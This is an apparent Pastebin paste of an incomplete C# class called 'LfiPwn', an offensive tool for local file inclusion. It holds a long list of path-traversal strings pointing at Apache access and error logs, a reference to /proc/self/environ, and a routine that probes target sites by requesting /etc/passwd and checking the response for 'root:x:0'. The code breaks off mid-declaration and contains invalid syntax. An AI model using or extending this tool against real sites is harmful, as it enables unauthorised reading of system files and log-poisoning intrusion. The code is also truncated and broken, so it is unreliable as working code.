Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- class LfiPwn {
- string[] logs = new string[]{@"../apache/logs/error.log",
- @"../apache/logs/access.log",
- @"../../apache/logs/error.log",
- @"../../apache/logs/access.log",
- @"../../../apache/logs/error.log",
- @"../../../apache/logs/access.log",
- @"../../../../../../../etc/httpd/logs/acces_log",
- @"../../../../../../../etc/httpd/logs/acces.log",
- @"../../../../../../../etc/httpd/logs/error_log",
- @"../../../../../../../etc/httpd/logs/error.log",
- @"../../../../../../../var/www/logs/access_log",
- @"../../../../../../../var/www/logs/access.log",
- @"../../../../../../../usr/local/apache/logs/access_log",
- @"../../../../../../../usr/local/apache/logs/access.log",
- @"../../../../../../../var/log/apache/access_log",
- @"../../../../../../../var/log/apache2/access_log",
- @"../../../../../../../var/log/apache/access.log",
- @"../../../../../../../var/log/apache2/access.log",
- @"../../../../../../../var/log/access_log",
- @"../../../../../../../var/log/access.log",
- @"../../../../../../../var/www/logs/error_log",
- @"../../../../../../../var/www/logs/error.log",
- @"../../../../../../../usr/local/apache/logs/error_log",
- @"../../../../../../../usr/local/apache/logs/error.log",
- @"../../../../../../../var/log/apache/error_log",
- @"../../../../../../../var/log/apache2/error_log",
- @"../../../../../../../var/log/apache/error.log",
- @"../../../../../../../var/log/apache2/error.log",
- @"../../../../../../../var/log/error_log",
- @"../../../../../../../var/log/error.log"}
- string environ = @"/proc/self/environ";
- public string trace_back(string lfi, int times) {
- string t = "";
- for(int i = 0; i < times; i++) {
- t += "../";
- }
- return lfi+t;
- }
- public bool is_vuln(string site) {
- if(!site.IndexOf("/etc/passwd") <= 0) return false;
- int max_depth = 10;
- for(int i = 0; i < max_depth; i++) {
- if(get_page(trace_back(site, i)).IndexOf("root:x:0") > 0) {
- return true;
- }
- }
- public bool
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement